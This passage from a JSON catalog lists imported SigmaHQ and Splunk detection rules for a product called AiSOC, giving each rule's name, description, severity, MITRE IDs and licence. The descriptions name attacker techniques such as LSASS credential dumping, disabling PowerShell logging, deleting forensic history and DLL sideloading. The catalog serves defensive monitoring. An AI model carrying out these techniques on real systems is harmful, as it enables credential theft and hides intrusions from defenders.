"sigmahq-sigma-fe2f9663-41cb-47e2-b954-8a228f3b9dff", "type": "detection", "name": "Linux Base64 Encoded Shebang In CLI", "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-base64-encoded-shebang-in-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" } }, { "id": "sigmahq-sigma-fe3a2d49-f255-4d10-935c-bda7391108eb", "type": "detection", "name": "New BITS Job Created Via PowerShell", "description": "Detects the creation of a new bits job by PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-bits-job-created-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe3a2d49-f255-4d10-935c-bda7391108eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_job_via_powershell.yml" } }, { "id": "sigmahq-sigma-fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "type": "detection", "name": "Malicious Named Pipe Created", "description": "Detects the creation of a named pipe seen used by known APTs or malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-named-pipe-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_susp_malicious_namedpipes.yml" } }, { "id": "sigmahq-sigma-fe513c69-734c-4d4a-8548-ac5f609be82b", "type": "detection", "name": "Google Cloud Firewall Modified or Deleted", "description": "Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-firewall-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe513c69-734c-4d4a-8548-ac5f609be82b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_firewall_rule_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-fe5ce7eb-dad8-467c-84a9-31ec23bd644a", "type": "detection", "name": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", "description": "Detects SyncAppvPublishingServer process execution, which is commonly used by adversaries to bypass PowerShell execution restrictions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/syncappvpublishingserver-bypass-powershell-restriction-ps-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" } }, { "id": "sigmahq-sigma-fe63010f-8823-4864-a96b-a7b4a0f7b929", "type": "detection", "name": "LSASS Process Reconnaissance Via Findstr.EXE", "description": "Detects findstr commands that include the keyword lsass, which indicates reconnaissance activity aimed at obtaining the LSASS process PID, typically a precursor to dumping LSASS memory for credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-process-reconnaissance-via-findstr-exe.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" } }, { "id": "sigmahq-sigma-fec96f39-988b-4586-b746-b93d59fd1922", "type": "detection", "name": "ScreenConnect Temporary Installation Artefact", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/screenconnect-temporary-installation-artefact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fec96f39-988b-4586-b746-b93d59fd1922", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml" } }, { "id": "sigmahq-sigma-fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", "type": "detection", "name": "PowerShell Logging Disabled Via Registry Key Tampering", "description": "Detects changes to the registry for the currently logged-in user. 
The goal of such changes is to disable PowerShell module logging, script block logging, transcription or script execution logging, i.e. to reduce PowerShell audit visibility before further activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-logging-disabled-via-registry-key-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" } }, { "id": "sigmahq-sigma-fed85bf9-e075-4280-9159-fbe8a023d6fa", "type": "detection", "name": "Advanced IP Scanner - File Event", "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/advanced-ip-scanner-file-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" } }, { "id": "sigmahq-sigma-fef394cd-f44d-4040-9b18-95d92fe278c0", "type": "detection", "name": "Potential DLL Sideloading Of DbgModel.DLL", "description": "Detects potential DLL sideloading of \"DbgModel.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-dbgmodel-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fef394cd-f44d-4040-9b18-95d92fe278c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_dbgmodel.yml" } }, { "id": "sigmahq-sigma-ff0f2b05-09db-4095-b96d-1b75ca24894a", "type": "detection", "name": "DotNET Assembly DLL Loaded Via 
Office Application", "description": "Detects any assembly DLL being loaded by an Office Product", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dotnet-assembly-dll-loaded-via-office-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_dotnet_assembly_dll_load.yml" } }, { "id": "sigmahq-sigma-ff151c33-45fa-475d-af4f-c2f93571f4fe", "type": "detection", "name": "Azure AD Health Monitoring Agent Registry Keys Access", "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-ad-health-monitoring-agent-registry-keys-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"ff151c33-45fa-475d-af4f-c2f93571f4fe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" } }, { "id": "sigmahq-sigma-ff23ffbc-3378-435e-992f-0624dcf93ab4", "type": "detection", "name": "HackTool - PurpleSharp Execution", "description": "Detects the execution of the PurpleSharp adversary simulation tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1587" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-purplesharp-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml" } }, { "id": "sigmahq-sigma-ff246f56-7f24-402a-baca-b86540e3925c", "type": "detection", "name": "Microsoft 365 - User Restricted from Sending Email", "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1199" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/microsoft-365-user-restricted-from-sending-email.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff246f56-7f24-402a-baca-b86540e3925c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_user_restricted_from_sending_email.yml" } }, { "id": "sigmahq-sigma-ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "type": "detection", "name": "Suspicious Scheduled Task Name As GUID", "description": "Detects creation of a scheduled task with a GUID like name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scheduled-task-name-as-guid.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_guid_task_name.yml" } }, { "id": "sigmahq-sigma-ff301988-c231-4bd0-834c-ac9d73b86586", "type": "detection", "name": "PowerShell Console History Logs Deleted", "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-console-history-logs-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff301988-c231-4bd0-834c-ac9d73b86586", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_powershell_command_history.yml" } }, { "id": "sigmahq-sigma-ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", "type": "detection", "name": "Disable Security Tools", "description": "Detects disabling security tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-security-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" } }, { "id": "sigmahq-sigma-ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "type": "detection", "name": "Mstsc.EXE Execution From Uncommon Parent", "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mstsc-exe-execution-from-uncommon-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" } }, { "id": "sigmahq-sigma-ff7139bc-fdb1-4437-92f2-6afefe8884cb", "type": "detection", "name": "OpenCanary - SSH Login Attempt", "description": "Detects instances where an SSH service on an OpenCanary node has had a login attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1021", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-ssh-login-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff7139bc-fdb1-4437-92f2-6afefe8884cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_ssh_login_attempt.yml" } }, { "id": "sigmahq-sigma-ff91e3f0-ad15-459f-9a85-1556390c138d", "type": "detection", "name": "Bitbucket Secret Scanning Rule Deleted", "description": "Detects when secret scanning rule is 
deleted for the project or repository.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-secret-scanning-rule-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff91e3f0-ad15-459f-9a85-1556390c138d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_secret_scanning_rule_deleted.yml" } }, { "id": "sigmahq-sigma-ff992eac-6449-4c60-8c1d-91c9722a1d48", "type": "detection", "name": "New Root Certificate Installed Via CertMgr.EXE", "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-root-certificate-installed-via-certmgr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/process_creation/proc_creation_win_certmgr_certificate_installation.yml" } }, { "id": "sigmahq-sigma-ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "type": "detection", "name": "User Added to Remote Desktop Users Group", "description": "Detects addition of users to the local Remote Desktop Users group via \"Net\" or \"Add-LocalGroupMember\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1136.001", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-remote-desktop-users-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml" } }, { "id": "sigmahq-sigma-ffa6861c-4461-4f59-8a41-578c39f3f23e", "type": "detection", "name": "LSASS Dump Keyword In CommandLine", "description": "Detects the presence of the keywords \"lsass\" and \".dmp\" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-dump-keyword-in-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml" } }, { "id": "sigmahq-sigma-fff9d2b7-e11c-4a69-93d3-40ef66189767", "type": "detection", "name": "Suspicious Copy From or To System Directory", "description": "Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-copy-from-or-to-system-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_copy_system_dir.yml" } }, { "id": "splunk-security-content-001266a6-9d5b-11eb-829b-acde48001122", "type": "detection", "name": "Windows Multiple Invalid Users Fail To Authenticate Using Kerberos", "description": "The following analytic identifies a source endpoint failing to authenticate with 30 unique invalid domain users using the Kerberos protocol. 
This detection leverages EventCode 4768, specifically looking for failure code 0x6, indicating the user is not found in the Kerberos database. This activity is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. If confirmed malicious, this could lead to unauthorized access or privilege escalation within the Active Directory environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-invalid-users-fail-to-authenticate-using-kerberos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "001266a6-9d5b-11eb-829b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_invalid_users_fail_to_authenticate_using_kerberos.yml" } }, { "id": "splunk-security-content-002f1e24-146e-11ec-a470-acde48001122", "type": "detection", "name": "Jscript Execution Using Cscript App", "description": "The following analytic detects the execution of JScript using the cscript.exe process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This behavior is significant because JScript files are typically executed by wscript.exe, making cscript.exe execution unusual and potentially indicative of malicious activity, such as the FIN7 group's tactics. 
If confirmed malicious, this activity could allow attackers to execute arbitrary scripts, leading to code execution, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/jscript-execution-using-cscript-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "002f1e24-146e-11ec-a470-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/jscript_execution_using_cscript_app.yml" } }, { "id": "splunk-security-content-004e32e2-146d-11ec-a83f-acde48001122", "type": "detection", "name": "XSL Script Execution With WMIC", "description": "The following analytic detects the execution of an XSL script using the WMIC process, which is often indicative of malicious activity. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving WMIC and XSL files. This behavior is significant as it has been associated with the FIN7 group, known for using this technique to execute malicious scripts. 
If confirmed malicious, this activity could allow attackers to execute arbitrary code, potentially leading to system compromise and further malicious actions within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1220" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/xsl-script-execution-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "004e32e2-146d-11ec-a83f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/xsl_script_execution_with_wmic.yml" } }, { "id": "splunk-security-content-00524d1f-a032-46f5-9108-e7d9f01bfb3c", "type": "detection", "name": "Windows Screen Capture in TEMP folder", "description": "The following analytic detects the creation of screen capture files by the Braodo stealer malware. This stealer is known to capture screenshots of the victim's desktop as part of its data theft activities. The detection focuses on identifying unusual screen capture activity, especially when images are saved in directories often used by malware, such as temporary or hidden folders. 
Monitoring for these files helps to quickly identify malicious screen capture attempts, allowing security teams to respond and mitigate potential information exposure before sensitive data is compromised.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-screen-capture-in-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "00524d1f-a032-46f5-9108-e7d9f01bfb3c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_screen_capture_in_temp_folder.yml" } }, { "id": "splunk-security-content-00958c7b-35db-4e7a-ad13-31550a7a7c64", "type": "detection", "name": "O365 Threat Intelligence Suspicious File Detected", "description": "The following analytic identifies when a malicious file is detected within the Microsoft Office 365 ecosystem through the Advanced Threat Protection engine. Attackers may stage and execute malicious files from within the Microsoft Office 365 ecosystem. Any detections from built-in Office 365 capabilities should be monitored and responded to appropriately. 
